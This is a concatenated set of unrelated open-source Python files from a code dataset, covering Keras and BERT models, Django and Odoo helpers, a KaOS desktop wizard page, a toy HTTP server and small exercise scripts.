Conv2D(32, (5, 5), 1, padding='same', activation='relu')(input)\n maxpool_1 = MaxPooling2D(pool_size=(2, 2), strides=2)(conv_1)\n dropout_1 = Dropout(rate=0.4)(maxpool_1)\n flatten = Flatten()(dropout_1)\n dense1 = Dense(128, activation='relu')(flatten)\n dropout_2 = Dropout(0.2)(dense1)\n output = Dense(10, activation='softmax')(dropout_2)\n model = Model(inputs=input, outputs=output)\n # >>> End of your code <<<\n\n return model\n\n\ndef train_model_mnist2(model, X, Y):\n \"\"\" Train the given model over the given instances. 
\"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n # >>> Start of your code <<<\n\n # Please use verbosity=2 for model.fit when generating evaluation log for\n # submission.\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.fit(X, keras.utils.to_categorical(Y), batch_size=128, verbose=2, epochs=2, validation_split=0.2)\n # >>> End of your code <<<\n\n return model\n","repo_name":"grizztastic/projects","sub_path":"Keras_Models_&_Numpy_Implementation/Keras_Model/MNIST/hw2_mnist.py","file_name":"hw2_mnist.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23122531841","text":"try:\n print(\"try....\")\n r = 10/0\n print('result:')\n#except ZeroDivisionError as e:\nexcept BaseException as e:\n print('result: ',e)\nfinally:\n print('finally')\n# 后续语句print('result:', r)不会被执行,except由于捕获到ZeroDivisionError,因此被执行。最后,finally语句被执行。然后,程序继续按照流程往下走。\n\n\n# 使用日志记录错误\nimport logging\n\ndef foo(s):\n return 10/int(s)\n\ndef bar(s):\n return foo(s) * 2\n\ndef main():\n try:\n bar('0')\n except BaseException as e:\n logging.exception(e)\n with open('test.log','w') as f:\n f.write('asdf')\n finally:\n print(\"finally\")\nif __name__ == '__main__':\n main()\n","repo_name":"iguess1220/python","sub_path":"错误处理.py","file_name":"错误处理.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28093530698","text":"from PyQt5.QtWidgets import QWizardPage, QLabel, QVBoxLayout, QSpacerItem, QSizePolicy, QHBoxLayout, QComboBox\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom os.path import join\nfrom .tools import Parser\n\n\nclass MenuWidget(QWizardPage):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setSubTitle(self.tr(\"
Select Menu Style\"))\n\n        texts = [\n            self.tr(\"Application Menu is the default for KaOS because of its \\\n                    extremely lightweight (and fast) structure.\"),\n            self.tr(\"Application Launcher is the standard for KDE. \\\n                    Application shortcuts are arranged under a tab structure.\"),\n            self.tr(\"Application Panel is a full screen menu style. \\\n                    Application shortcuts are arranged so that you can access them quickly and easily.\")\n        ]\n\n        self.menus = [[\":/data/images/menu-kicker.png\", texts[0]],\n                      [\":/data/images/menu-kickoff.png\", texts[1]],\n                      [\":/data/images/menu-kimpanel.png\", texts[2]]]\n\n        vlayout = QVBoxLayout(self)\n\n        labelLayout = QHBoxLayout()\n\n        iconLabel = QLabel()\n        iconLabel.setMaximumSize(64, 64)\n        iconLabel.setPixmap(QIcon.fromTheme(\"kde\").pixmap(64, 64))\n        labelLayout.addWidget(iconLabel)\n\n        label = QLabel(self)\n        label.setText(self.tr(\"You can also customize your KDE menu as you like. \\\n            Please choose one from the following styles.
    \"))\n labelLayout.addWidget(label)\n vlayout.addLayout(labelLayout)\n\n vlayout.addItem(QSpacerItem(20, 40, QSizePolicy.Preferred, QSizePolicy.Preferred))\n\n self.comboBox = QComboBox(self)\n self.comboBox.addItem(self.tr(\"Application Menu\"))\n self.comboBox.addItem(self.tr(\"Application Launcher\"))\n self.comboBox.addItem(self.tr(\"Application Dashboard\"))\n vlayout.addWidget(self.comboBox)\n\n vlayout.addItem(QSpacerItem(20, 40, QSizePolicy.Preferred, QSizePolicy.Preferred))\n\n hlayout = QHBoxLayout(self)\n\n self.labelMenu = QLabel(self)\n self.labelMenu.setPixmap(QPixmap(self.menus[0][0]))\n self.labelMenu.setMaximumSize(350 ,214)\n hlayout.addWidget(self.labelMenu)\n self.labelText = QLabel(self)\n self.labelText.setWordWrap(True)\n self.labelText.setText(self.tr(self.menus[0][1]))\n hlayout.addWidget(self.labelText)\n\n vlayout.addLayout(hlayout)\n\n vlayout.addItem(QSpacerItem(20, 40, QSizePolicy.Preferred, QSizePolicy.Preferred))\n\n self.comboBox.currentIndexChanged.connect(self.menuSelect)\n\n self.menuSelected = 0\n\n\n def menuSelect(self, index):\n self.menuSelected = index\n self.labelMenu.setPixmap(QPixmap(self.menus[index][0]))\n self.labelText.setText(self.menus[index][1])\n\n def execute(self):\n menus = [\"org.kde.plasma.kicker\", \"org.kde.plasma.kickoff\", \"org.kde.plasma.kickerdash\"]\n menu = menus[self.menuSelected]\n\n configFilePath = join(QDir.homePath(), \".config\", \"plasma-org.kde.plasma.desktop-appletsrc\")\n parser = Parser(configFilePath)\n\n parser.setMenuStyleOrCreate(menu)\n","repo_name":"KaOSx/kaptan","sub_path":"kaptan5/libkaptan/ui_menu.py","file_name":"ui_menu.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"6130710972","text":"from decimal import Decimal\n\nfrom django.db.models import DecimalField, Q, QuerySet, Sum\nfrom django.db.models.functions import Coalesce\n\nfrom ...constants import TransactionTypes\n\n\nclass TransactionQuerySet(QuerySet):\n def aggregate_totals(self) -> dict[str, Decimal]:\n return self.aggregate(\n total_income=Coalesce(\n Sum(\n \"amount\",\n filter=Q(transaction_type=TransactionTypes.INCOME),\n ),\n 0,\n output_field=DecimalField(),\n ),\n total_expenses=Coalesce(\n Sum(\n \"amount\",\n filter=Q(transaction_type=TransactionTypes.EXPENSE),\n ),\n 0,\n output_field=DecimalField(),\n ),\n )\n\n def get_balance(self) -> dict[str, Decimal]:\n response_dict = {}\n totals_dict = self.aggregate_totals()\n response_dict[\"balance\"] = (\n totals_dict[\"total_income\"] - totals_dict[\"total_expenses\"]\n )\n return response_dict\n","repo_name":"sharvadim07/pockets","sub_path":"server/apps/pockets/models/querysets/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73924917671","text":"# coding: utf-8\n\nimport socket\nimport os.path\n\nSERVER_HOST = '127.0.0.1'\nSERVER_PORT = 8000\n\ndef create_socket():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind((SERVER_HOST, SERVER_PORT))\n server.listen(1)\n\n return server \n\ndef get_file_name(request):\n headers = request.split('\\n')\n filename = headers[0].split()[1]\n\n return filename\n\ndef send_response(client_connect, file_name):\n if file_name == \"/\":\n if os.path.isfile(\"index.html\"):\n with open(\"index.html\", \"w\") as 
file:\n content = file.read()\n response = \"HTTP/1.0 200 OK\\n\\n\" + content \n else: \n response = 'HTTP/1.0 200 OK\\n\\n\\n\\n\\tHello World'\n else:\n try:\n file_name = file_name[1:]\n with open(file_name, \"r\") as file:\n content = file.read()\n response = \"HTTP/1.0 200 OK\\n\\n\" + content\n except FileNotFoundError:\n response = \"HTTP/1.0 404 NOT FOUND\\n\\n OUPS File Not Found\"\n \n client_connect.sendall(response.encode())\n\ndef handle_connect(server):\n while True:\n client_connect, client_addr = server.accept()\n request = client_connect.recv(1024).decode()\n\n print(\"[server] client {} send a request\".format(client_addr))\n\n file_name = get_file_name(request)\n print(\"GET {}\".format(file_name))\n send_response(client_connect, file_name)\n\n client_connect.close()\n\nif __name__ == \"__main__\":\n server = create_socket()\n handle_connect(server)","repo_name":"Aziz-Fall/server","sub_path":"serveurhttp.py","file_name":"serveurhttp.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18999423488","text":"# Created by: Aiden Ridgeway\n# Created on 5/25/19\n\n\nimport random\nfrom time import sleep\nimport os\n\nplay = 1\n\noutput = []\ncount = 0\nscore = 0\n\ndef cls(): print(\"\\n\" * 50) # moves current text off of the screen\n\n\nwhile play == 1:\n a = (random.randint(1, 4))\n output.append(a)\n print(\"Ready...\")\n sleep(.5)\n cls()\n for val in output: # shows each value in the list once, on its own screen\n print(val)\n sleep(1)\n cls()\n sleep(.5)\n\n print(\"Enter all of the previous values\")\n for val in output: # reads each value individually and compares it to expected value to see if the user is correct\n i = 0\n i = input()\n i = int(i)\n if i != val:\n play = 0\n\n score = str(len(output))\nprint(\"Your Score was: \" + score)\n","repo_name":"akr00/Personal-RaspPi-Project","sub_path":".idea/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33552167468","text":"#!/usr/bin/env python\n# -*-coding:utf-8 -*-\n\n\"\"\"\n类的单例模式\n\"\"\"\n\n\ndef singleton(cls):\n __instances__ = {}\n\n def get_instance(*sub, **kw):\n key = (cls, tuple(sub), tuple(sorted(kw.items())))\n if key not in __instances__:\n __instances__[key] = cls(*sub, **kw)\n return __instances__[key]\n\n return get_instance\n\n\nif __name__ == '__main__':\n\n @singleton\n class Foo(object):\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n\n f1 = Foo('Linda', 18)\n f2 = Foo('Linda', 18)\n f3 = Foo('Jonathan', 28)\n\n print(id(f1)) # 2084750555512, f1==f2\n print(id(f2)) # 2084750555512, f1==f2\n print(id(f3)) # 2084750555064, f3单独实例\n","repo_name":"ni-ning/LearnPython","sub_path":"22Util/single.py","file_name":"single.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"75224979","text":"import pytest\nimport typing\n\nfrom smb.common.testing_utils import dt\n\nfrom crm.agency_cabinet.ord.common import structs, consts\nfrom crm.agency_cabinet.ord.server.src import procedures\nfrom crm.agency_cabinet.ord.server.src.db import models\n\n\n@pytest.fixture\ndef procedure():\n return procedures.CreateReport()\n\n\nasync def test_create_report(procedure, fixture_report_settings: typing.List[models.ReportSettings]):\n created = await 
procedure(structs.CreateReportRequest(\n        agency_id=1,\n        period_from=dt('2222-3-1 00:00:00'),\n        reporter_type=consts.ReporterType.partner,\n    ))\n\n    report = await models.Report.query.where(models.Report.period_from == dt('2222-3-1 00:00:00')).gino.first()\n    assert created == structs.ReportInfo(\n        report_id=report.id,\n        period_from=report.period_from,\n        status=consts.ReportStatuses.draft,\n        reporter_type=consts.ReporterType.partner,\n        clients_count=0,\n        campaigns_count=0,\n        sending_date=None,\n        settings=structs.ReportSettings(\n            name='other',\n            display_name='Другое',\n            allow_create_ad_distributor_acts=True,\n            allow_create_clients=True,\n            allow_create_campaigns=True,\n            allow_edit_report=True,\n        )\n    )\n\n    await report.delete()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crm/tests/procedures/reports/test_create_report.py","file_name":"test_create_report.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6783154418","text":"# from turtle import*\n# import colorsys\n# bgcolor('black')\n# tracer(10)\n# pensize(5)\n# h=0\n# for i in range(300):\n#     c= colorsys.hsv_to_rgb(h,1,1)\n#     h += 3.140\n#     pencolor(c)\n#     fillcolor('black')\n#     begin_fill()\n#     for j in range(2):\n#         fd(i*1.2)\n#         rt(100)\n#         fd(350)\n#         rt(123)\n#     rt(121)\n#     end_fill()\n# done()\n\nfrom turtle import *\nfrom time import sleep\n\nbgcolor(\"black\")\nt = [Turtle(), Turtle()]\nx = 6\ncolors = [\"red\", \"yellow\", \"blue\", \"lime\"]\nfor index, i in enumerate(t):\n    i.speed(0)\n    i.color(\"white\")\n    i.shapesize(0.3)\n    i.width(3)\n    i.pu()\n    i.seth(90)\n    i.fd(350)\n    i.seth(-180)\n    i.pd()\nt[0].pu()\n\ndelay(0)\nspeed(0)\nht()\nsleep(4)\nfor i in colors:\n    color(i)\n    for i in range(360):\n        t[0].fd(x)\n        t[0].lt(1)\n        pu()\n        goto(t[0].pos())\n        pd()\n        t[1].fd(2 * x)\n        t[1].lt(2)\n        goto(t[1].pos())\ndone()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Baizak04/def","sub_path":"Python/python/Python/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38744550728","text":"from odoo import http\nfrom odoo.http import request\nfrom odoo import fields, http, SUPERUSER_ID, _\nfrom odoo.addons.portal.controllers.portal import pager as portal_pager, get_records_pager\nfrom odoo.addons.portal.controllers import portal\n\n\nclass TimeOffcontroller(portal.CustomerPortal):\n    def _prepare_home_portal_values(self, counters):\n        values = super()._prepare_home_portal_values(counters)\n        partner = request.env.user.partner_id\n\n        HrLeave = request.env['hr.leave']\n        if 'leave_count' in counters:\n            values['leave_count'] = HrLeave.search_count([\n                ('message_partner_ids', 'child_of', [partner.commercial_partner_id.id]),\n                ('state', 'in', ['draft', 'confirm','refused','validate1','validate'])\n            ]) if HrLeave.check_access_rights('read', raise_exception=False) else 0\n        return values\n    \n    @http.route(['/my/timeoff', '/my/timeoff/page/<int:page>'], type='http', auth=\"user\", website=True)\n    def portal_my_timeoff(self, page=1, date_begin=None, date_end=None, sortby=None, **kw):\n        values = self._prepare_portal_layout_values()\n        partner = request.env.user.partner_id\n        HrLeave = request.env['hr.leave']\n        \n        domain = [\n            ('message_partner_ids', 'child_of', [partner.commercial_partner_id.id]),\n            ('state', 'in', ['draft', 'confirm','refused','validate1','validate'])\n        ]\n        leave_count = 
HrLeave.search_count(domain)\n pager = portal_pager(\n url=\"/my/timeoff\",\n total=leave_count,\n page=page,\n )\n res = request.env['hr.leave'].search([('employee_ids','=',request.env.user.name)])\n values.update({\n \n 'res': res.sudo(),\n 'pager': pager,\n 'default_url': '/my/timeoff',\n })\n return request.render('timeoff_custom.portal_my_timeoff_details', values,{'res':res})\n \n\n","repo_name":"miva-odoo/odoo-task","sub_path":"timeoff_custom_2/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32866577926","text":"import re\nimport lmdb\nimport glob\nimport os\nfrom PIL import Image\nimport sqlite3\nimport time\nimport h5py\nimport numpy as np\n\n## Check SLURM is running\nif os.environ.get(\"SLURM_TMPDIR\") == None:\n raise ValueError(\"STLUM_TMPDIR not defined\")\ndata_dir = os.environ.get(\"SLURM_TMPDIR\") + \"/mnt/ramdisk/max/90kDICT32px/\"\n\n## Upack files to SLURM_TMPDIR\nprint(\"untar files to $SLURM_TMPDIR\")\nos.system(\"tar -C $SLURM_TMPDIR -xf mjsynth.tar.gz\")\nprint(\"untar done\")\n\n## List files inside the first level directory\nlevel_0 = glob.glob(os.path.join(data_dir + \"/*\"))\n\nif len(level_0) == 0:\n raise ValueError(\"No files in directoy\" + data_dir)\n\n################################# HDF5 file\nf = h5py.File('TextImages.hdf5')\ndt = h5py.special_dtype(vlen=np.dtype('uint8'))\ndset = f.create_dataset('images', (10000000, ), dtype=dt)\n\n\n################################# SQL file with meta info\n### sqlite file\nsql_conn = sqlite3.connect(\"TextImages-hdf5.sqlite\")\ncur = sql_conn.cursor()\nsql_table = 'CREATE TABLE IF NOT EXISTS meta (key integer PRIMARY KEY, label text NOT NULL, path text);'\ncur.execute(sql_table)\n\n#################################\nfiles_counter = 0\n\ntic = time.time()\n\nfor L0 in level_0:\n # skip files (not directories)\n if os.path.isfile(L0):\n print(\"Not a directory on the first level: \" + L0)\n continue\n \n level_1 = glob.glob(os.path.join(L0 + \"/*\"))\n\n for L1 in level_1:\n level_2 = glob.glob(os.path.join(L1 + \"/*\"))\n num_of_files = len(level_2)\n #num_of_files = 2\n for i in range(num_of_files): \n L2 = level_2[i]\n files_counter = files_counter + 1\n\n if(files_counter % 1000 == 0): \n print(\"working with file number:\" + str(files_counter))\n \n remaining_path, file_name = os.path.split(L2)\n remaining_path, dir1 = os.path.split(remaining_path)\n remaining_path, dir2 = os.path.split(remaining_path)\n original_path = dir2 + \"/\" + dir1 + \"/\" + file_name\n key = files_counter - 1 \n\n label = \"\".join(re.findall(\"_[a-zA-Z]+_\", file_name)).strip(\"_\")\n try:\n with open(L2, mode='rb') as file:\n value = file.read()\n \n dset[files_counter - 1] = np.fromstring(value, dtype='uint8')\n \n sql_insert = 'INSERT INTO meta(key,label,path) VALUES(' + \\\n str(key) +',\"' + label + '\",\"' + original_path + '\");'\n \n cur.execute(sql_insert)\n\n except Exception as e:\n print(\"Error observed: \" + str(e))\n with open(\"errors_hdf5.txt\", \"a+\") as file:\n file.write(\"Error:\" + str(e) + \" . 
Observed for file \" + L2 + \"\\n\" )\n    \nsql_conn.commit()\nsql_conn.close()\nf.close() \nprint(\"Process took: \" + str(time.time() - tic))\nprint(\"DONE!\")\n\n","repo_name":"nyuhpc/public_ml","sub_path":"Data_read_benchmarking/TextImages/write_jpg_hdf5_all.py","file_name":"write_jpg_hdf5_all.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40116824548","text":"\"\"\"\n.. module:: helper\n   :platform: Platform Independent\n   :synopsis: This module has commonly used helper functions used by client\n\"\"\"\n\n\nimport os\nimport sys\nimport glob\nimport platform\nimport wave\nimport random\nimport string\nimport datetime\nimport time\nimport json\nimport collections\nimport numpy as np\nfrom array import array\n\n\ndef eprint(*args, **kwargs):\n    print(*args, file=sys.stderr, **kwargs)\n\n\ndef _creation_date(path_to_file):\n    \"\"\"\n    Internal function for getting creation date\n    Try to get the date that a file was created, falling back to when it was\n    last modified if that isn't possible.\n    See http://stackoverflow.com/a/39501288/1709587 for explanation.\n\n    :param path_to_file: Get unique file name by getting creation date\n    :type path_to_file: string\n    :return: get creation date\n    :rtype: stat.st_mtime\n\n    \"\"\"\n    if platform.system() == \"Windows\":\n        return os.path.getctime(path_to_file)\n    else:\n        stat = os.stat(path_to_file)\n        try:\n            return stat.st_birthtime\n        except AttributeError:\n            # We're probably on Linux. No easy way to get creation dates here,\n            # so we'll settle for when its content was last modified.\n            return stat.st_mtime\n\n\ndef get_current_time():\n    \"\"\"Return Current Time in MS.\"\"\"\n\n    return int(round(time.time() * 1000))\n\n\ndef get_current_time_now():\n    \"\"\"Return Current Time in MS.\"\"\"\n\n    return datetime.datetime.now()\n\n\ndef generate_filename():\n    rand_str = \"\".join(random.choices(string.ascii_uppercase + string.digits, k=8))\n    now = datetime.datetime.now().strftime(\"%d-%m-%Y-%H-%M-%S\")\n\n    return now + rand_str\n\n\ndef write_audio_wave(audio_data, filename, RATE, SAMPLE_WIDTH, CHANNELS=1):\n    if len(audio_data) > 100:\n        print(\"writing wav audio\")\n        wf = wave.open(filename, \"wb\")\n        wf.setnchannels(CHANNELS)\n        wf.setsampwidth(SAMPLE_WIDTH)\n        wf.setframerate(RATE)\n        wf.writeframes(b\"\".join(audio_data))\n        wf.close()\n    else:\n        print(\"audio Data is empty, skip save\", flush=True)\n\n\n\ndef write_audio(audio_data, filename, RATE, SAMPLE_WIDTH, CHANNELS=1):\n    f = open(filename, \"w+b\")\n    # binary_format = bytes(audio_data)\n    # binary_format = bytearray(audio_data)\n    binary_format = b\"\".join(audio_data)\n    f.write(binary_format)\n    f.close()\n\n\ndef write_audio_flac(audio_data, filename):\n\n    # arr = numpy.array(audio_data, dtype=numpy.float32)\n    # print(\"arr.dtype\", arr.dtype)\n    # bytearray(audio_data)\n\n    mat = np.array(audio_data)\n    print(\"\\n\\n***mat.dtype\", mat.dtype)\n\n    if len(audio_data) > 100:\n        binary_format = b\"\".join(audio_data)\n        f = open(filename, \"w+b\")\n        f.write(binary_format)\n        f.close()\n    else:\n        print(\"audio Data is empty, skip save\", flush=True)\n\n    # sf.write(filename, arr, RATE)\n","repo_name":"keplerlab/enhant","sub_path":"api/transcription_svc/websocket-server/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"71643871594","text":"def age():\n    try:\n        age = int(input('Age: '))\n        year = 
int(input('Year: '))\n salary = int(100000)\n risk = salary / age / year\n print(risk)\n except ZeroDivisionError:\n print(\"Can't divide by this number\")\n except ValueError:\n print(\"Not a numerical value\")\nage()\n\n","repo_name":"KennyIT3/Python_Scipts-Automating-Sysadmin","sub_path":"Scripts/salary.py","file_name":"salary.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32581351759","text":"from functools import wraps\n\nfrom django.http.response import HttpResponse\nfrom rest_framework import status\nfrom rest_framework.response import Response\n\n\ndef with_serializer(serializerClass, success_code=status.HTTP_201_CREATED,\n dataGetter=lambda request: request.data,\n **kwargs):\n def dec(func):\n @wraps(func)\n def c(*a, **k):\n\n if len(a) == 2:\n self, request = a[:2]\n elif len(a) == 1:\n self, request = None, a[0]\n else:\n raise AssertionError(\"Incorrect argument count\")\n\n serializer = serializerClass(data=dataGetter(request), context={\n \"request\": request,\n \"view\": self\n }, **kwargs)\n\n if serializer.is_valid():\n a += (serializer, )\n out = func(*a, **k)\n\n if not isinstance(out, HttpResponse):\n return Response(out, status=success_code)\n return out\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n return c\n return dec\n","repo_name":"andruwwwka/rebus-hackathon-final","sub_path":"core/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35785244071","text":"# import sys\n# sys.stdin = open('input.txt')\n# from pprint import pprint\n# T = int(input())\n# for tc in range(1,T+1):\n# N = int(input())\n\n# board = [[0 for _ in range(10)] for _ in range(10)]\n# pprint(board)\n# for i in range(N):\n# color_data = list(map(int, input().split())) \n# left_top_x = color_data[0]\n# left_top_y = color_data[1]\n# rigt_bottom_x = color_data[2]\n# right_bottom_y = color_data[3]\n\n# color = color_data[4]\n\n# for x in range(left_top_x,rigt_bottom_x+1):\n# for y in range(left_top_y,right_bottom_y+1):\n# board[x][y] += color\n# count = 0\n# for x in range(10):\n# for y in range(10):\n# if board[x][y] == 3:\n# count += 1\n\n\n# 부분집합\nnumbers = [2,5,1,4]\n\nn = len(numbers)\n\n# 1을 두번씩 곱해간다 => 2^4\nfor i in range(1<= 90:\r\n return \"A\"\r\n elif score >=80:\r\n return \"B\"\r\n elif score >=70:\r\n return \"C\"\r\n elif score >=60:\r\n return \"D\"\r\n else:\r\n return \"F\"\r\n\r\ndef get_class_average(students):\r\n results = []\r\n for i in students:\r\n results.append(get_average(i))\r\n return average(results)\r\n\r\n\r\nprint(get_class_average((students)))\r\nprint(get_letter_grade(get_class_average(students)))","repo_name":"ariiel1/Assignment-Week-6","sub_path":"Assignment 4/Assignment-4.py","file_name":"Assignment-4.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5420254978","text":"from pygame import *\nfrom random import randint\n\nsize = width, height = 800, 600\nscreen = display.set_mode(size)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nrectList = [Rect(randint(0, width-40), randint(0, height-40), 40, 40) for i in range(10)]\n\nrunning = True\nwhile running:\n for evt in event.get():\n if evt.type == QUIT:\n running = 
False\n mp = mouse.get_pos()\n mb = mouse.get_pressed()\n for rect in rectList:\n color = GREEN\n if rect.collidepoint(mp):\n if mb[0]:\n color = RED\n else:\n color = BLUE\n draw.rect(screen, color, rect)\n display.flip()\n\nraise SystemExit\n","repo_name":"BlazingAsher/ICS3U-Coursework","sub_path":"randomrectptest4.py","file_name":"randomrectptest4.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41032067544","text":"\"\"\"Rewrite a simplified BERT version based on the huggingface BERT but allow for scripting to all kinds of variations.\"\"\"\nfrom typing import Optional\n\nimport torch\n\nfrom .components import (\n AttentionComponent,\n EmbeddingComponent,\n FFNComponent,\n PoolingComponent,\n PredictionHeadComponent,\n _get_nonlin_fn,\n _get_norm_fn,\n)\n\n# import torchdynamo # need to disable dynamo in dynamic parts\n\n\ndef construct_fixed_cramlm(cfg_arch, vocab_size, downstream_classes=None):\n \"\"\"See the config file for details on what is possible.\"\"\"\n cfg_arch.embedding.vocab_size = vocab_size\n cfg_arch.num_labels = downstream_classes\n if downstream_classes is None:\n model = ScriptableLMForPreTraining(ScriptableLM(cfg_arch), cfg_arch)\n else:\n model = ScriptableLMForSequenceClassification(ScriptableLM(cfg_arch), cfg_arch)\n return model\n\n\nclass TransformerLayer(torch.nn.Module):\n \"\"\"A transformer-encoder structure based on the components from above.\"\"\"\n\n def __init__(self, idx, cfg_arch):\n super().__init__()\n self.dropout = torch.nn.Dropout(cfg_arch.hidden_dropout_prob, inplace=False)\n self.norm1 = _get_norm_fn(cfg_arch.norm)(cfg_arch.hidden_size, eps=cfg_arch.norm_eps)\n self.norm2 = _get_norm_fn(cfg_arch.norm)(cfg_arch.hidden_size, eps=cfg_arch.norm_eps)\n self.attn = AttentionComponent(\n idx,\n cfg_arch.hidden_size,\n cfg_arch.attention,\n cfg_arch.use_bias,\n )\n self.ffn = FFNComponent(\n cfg_arch.hidden_size,\n cfg_arch.intermed_size,\n _get_nonlin_fn(cfg_arch.nonlin),\n cfg_arch.use_bias,\n )\n\n def forward(self, states, attention_mask: Optional[torch.Tensor] = None):\n states = states + self.dropout(self.attn(self.norm1(states), attention_mask))\n states = states + self.dropout(self.ffn(self.norm2(states)))\n return states\n\n\nclass ScriptableLM(torch.nn.Module):\n \"\"\"Definitely can represent BERT, but also a lot of other things. To be used for MLM schemes.\"\"\"\n\n def __init__(self, cfg_arch):\n super().__init__()\n self.cfg = cfg_arch\n\n self.embedding = EmbeddingComponent(cfg_arch.embedding, cfg_arch.norm, cfg_arch.norm_eps)\n self.layers = torch.nn.ModuleList([TransformerLayer(idx, cfg_arch) for idx in range(cfg_arch.num_transformer_layers)])\n\n if self.cfg.final_norm:\n self.final_norm = _get_norm_fn(cfg_arch.norm)(cfg_arch.hidden_size, eps=cfg_arch.norm_eps)\n else:\n self.final_norm = torch.nn.Identity()\n\n def forward(self, input_ids, attention_mask: Optional[torch.Tensor] = None, labels: Optional[torch.Tensor] = None):\n hidden_states = self.embedding(input_ids)\n hidden_states = hidden_states.transpose(0, 1).contiguous()\n\n for i, layer_module in enumerate(self.layers):\n hidden_states = layer_module(hidden_states, attention_mask)\n\n hidden_states = hidden_states.transpose(0, 1).contiguous()\n\n return self.final_norm(hidden_states)\n\n\nclass ScriptableLMForPreTraining(torch.nn.Module):\n \"\"\"Definitely can represent BERT, but also a lot of other things. 
To be used for MLM schemes.\"\"\"\n\n def __init__(self, encoder, cfg_arch):\n super().__init__()\n self.cfg = cfg_arch\n\n self.encoder = encoder\n self.prediction_head = PredictionHeadComponent(cfg_arch)\n\n self.decoder = torch.nn.Linear(cfg_arch.embedding.embedding_dim, cfg_arch.embedding.vocab_size, bias=cfg_arch.decoder_bias)\n self.decoder.weight = self.encoder.embedding.word_embedding.weight\n\n self.loss_fn = torch.nn.CrossEntropyLoss()\n self.sparse_prediction = self.cfg.sparse_prediction\n self.vocab_size = cfg_arch.embedding.vocab_size\n\n for name, module in self.named_modules():\n _init_module(\n name,\n module,\n self.cfg.init.type,\n self.cfg.init.std,\n self.cfg.hidden_size,\n self.cfg.num_transformer_layers,\n )\n\n def forward(self, input_ids, attention_mask: Optional[torch.Tensor] = None, labels: Optional[torch.Tensor] = None):\n outputs = self.encoder(input_ids, attention_mask)\n outputs = outputs.view(-1, outputs.shape[-1])\n\n if self.sparse_prediction:\n masked_lm_loss = self._forward_dynamic(outputs, labels)\n else:\n outputs = self.decoder(self.prediction_head(outputs))\n if labels is not None:\n masked_lm_loss = self.loss_fn(outputs, labels.view(-1))\n else:\n masked_lm_loss = outputs.new_zeros((1,))\n\n return {\"loss\": masked_lm_loss}\n\n # Sparse prediction can have an unpredictable number of entries in each batch\n # depending on how MLM is running\n # for this reason, the code has to fall back to eager mode there\n # @torchdynamo.disable\n def _forward_dynamic(self, outputs: torch.Tensor, labels: Optional[torch.Tensor] = None):\n if labels is not None:\n labels = labels.view(-1)\n mask_positions = labels.view(-1) != self.loss_fn.ignore_index\n outputs = outputs[mask_positions]\n labels = labels[mask_positions]\n\n outputs = self.decoder(self.prediction_head(outputs))\n if labels is not None:\n masked_lm_loss = self.loss_fn(outputs, labels)\n else:\n masked_lm_loss = outputs.new_zeros((1,))\n return masked_lm_loss\n\n\nclass ScriptableLMForSequenceClassification(torch.nn.Module):\n \"\"\"Classification head and pooler.\"\"\"\n\n def __init__(self, encoder, cfg_arch):\n super().__init__()\n self.cfg = cfg_arch\n\n self.encoder = encoder\n self.pooler = PoolingComponent(cfg_arch.classification_head, 